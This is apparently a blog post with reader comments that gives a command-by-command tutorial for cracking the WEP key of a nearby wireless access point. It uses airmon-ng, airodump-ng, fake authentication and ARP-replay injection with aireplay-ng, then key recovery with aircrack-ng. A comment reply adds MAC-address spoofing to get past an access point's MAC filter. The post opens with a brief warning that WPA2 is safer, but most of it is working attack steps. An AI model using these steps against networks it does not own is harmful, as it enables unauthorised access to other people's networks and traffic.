Download it from http://www.remote-exploit.org/
The latest version is an ISO file, what can I do?
The way I used is to download the software called unetbootin-windows. It helps you duplicate the whole Linux system in the ISO file to a USB drive. After this, just boot your computer by the USB drive.
This clip is made by yasir25119918
Below is the steps to crack a WEP protected AP, it teaches us that it's more safe to use the Ethernet instead of the Wireless. If you really want to use Wireless AP, exploiting a high security protection(WPA2) is very important. (WEP and WPA can already be cracked by aircrack-ng program. There's program that can spoof wireless card's MAC so it's still vulnerable to use MAC filter)
1. "airmon-ng" to find your wireless interface (said wlan0, ra0, etc..)
2. "airmon-ng start ra0" to enable monitor mode from managed mode (ra0 is your interface name)
3. "airodump-ng ra0" to get all APs within the area (Reference the table below to know the meaning of all the fields, http://www.aircrack-ng.org/doku.php?id=airodump-ng)
| Field | Description |
|---|---|
| BSSID | MAC address of the access point. In the Client section, a BSSID of ”(not associated)” means that the client is not associated with any AP. In this unassociated state, it is searching for an AP to connect with. |
| PWR | Signal level reported by the card. Its signification depends on the driver, but as the signal gets higher you get closer to the AP or the station. If the BSSID PWR is -1, then the driver doesn't support signal level reporting. If the PWR is -1 for a limited number of stations then this is for a packet which came from the AP to the client but the client transmissions are out of range for your card. Meaning you are hearing only 1/2 of the communication. If all clients have PWR as -1 then the driver doesn't support signal level reporting. |
| RXQ | Receive Quality as measured by the percentage of packets (management and data frames) successfully received over the last 10 seconds. See note below for a more detailed explanation. |
| Beacons | Number of announcements packets sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far. |
| # Data | Number of captured data packets (if WEP, unique IV count), including data broadcast packets. |
| #/s | Number of data packets per second measure over the last 10 seconds. |
| CH | Channel number (taken from beacon packets). Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference. |
| MB | Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g. The dot (after 54 above) indicates short preamble is supported. Displays “e” following the MB speed value if the network has QoSenabled. |
| ENC | Encryption algorithm in use. OPN = no encryption,”WEP?” = WEP or higher (not enough data to choose between WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP is present. |
| CIPHER | The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2. WEP40 is displayed when the key index is greater then 0. The standard states that the index can be 0-3 for 40bit and should be 0 for 104 bit. |
| AUTH | The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2), or OPN (open for WEP). |
| ESSID | The so-called “SSID”, which can be empty if SSID hiding is activated. In this case, airodump-ng will try to recover the SSID from probe responses and association requests. |
| STATION | MAC address of each associated station or stations searching for an AP to connect with. Clients not currently associated with an AP have a BSSID of ”(not associated)”. |
| Lost | The number of data packets lost over the last 10 seconds based on the sequence number. See note below for a more detailed explanation. |
| Packets | The number of data packets sent by the client. |
| Probes | The ESSIDs probed by the client. These are the networks the client is trying to connect to if it is not currently connected. |
4. Note down:
(1) Interface
(2) AP's name (ESSID)
(3) AP's BSSID
(4) AP's channel
5. "airodump-ng -w wep -c 11 --bssid 00:A0:C5:12:34:56 ra0" to lock down the AP you wanna crack (capture packet)
6. "aireplay-ng -1 0 -a 00:A0:C5:12:34:56 ra0" to associate you with the AP. (Fake authentication attack)
7. "aireplay-ng -3 -b 00:A0:C5:12:34:56 ra0"; wait until the #Data reaches 30000. Then "Ctrl+c" to break this command. The encapsulation file will be stored under the path where you are at. (ARP request replay attack)
8. "aircrack-ng wep.cap". The software will tell you the key has been found [05:61:31:AB:33] (aircrack-ng)
Posts
6 Comment:
There is possibility when you press airmon-ng not to be appeared your chipset and interface
I reckon it's possible because the driver may not be supported yet.
when i tried this... i dunno if the AP's mac filtering was on or wat.... but it wont authenticate me.... wat can i do??
Maybe you can find the MAC address which is allowed in the filtering table from the STATION field. Then use MAC spoofing, http://www.aircrack-ng.org/doku.php?id=faq#how_do_i_change_my_card_s_mac_address
But there might have another problem, the MAC conflict could happen, when the real NIC with the same MAC as your spoofing one is using at the same time.
this works like a charm. if the wep auth=opn, what should be done differently?
I can see that you are an expert at your field! I am launching a website soon, and your information will be very useful for me.. Thanks for all your help and wishing you all the success in your business.
Post a Comment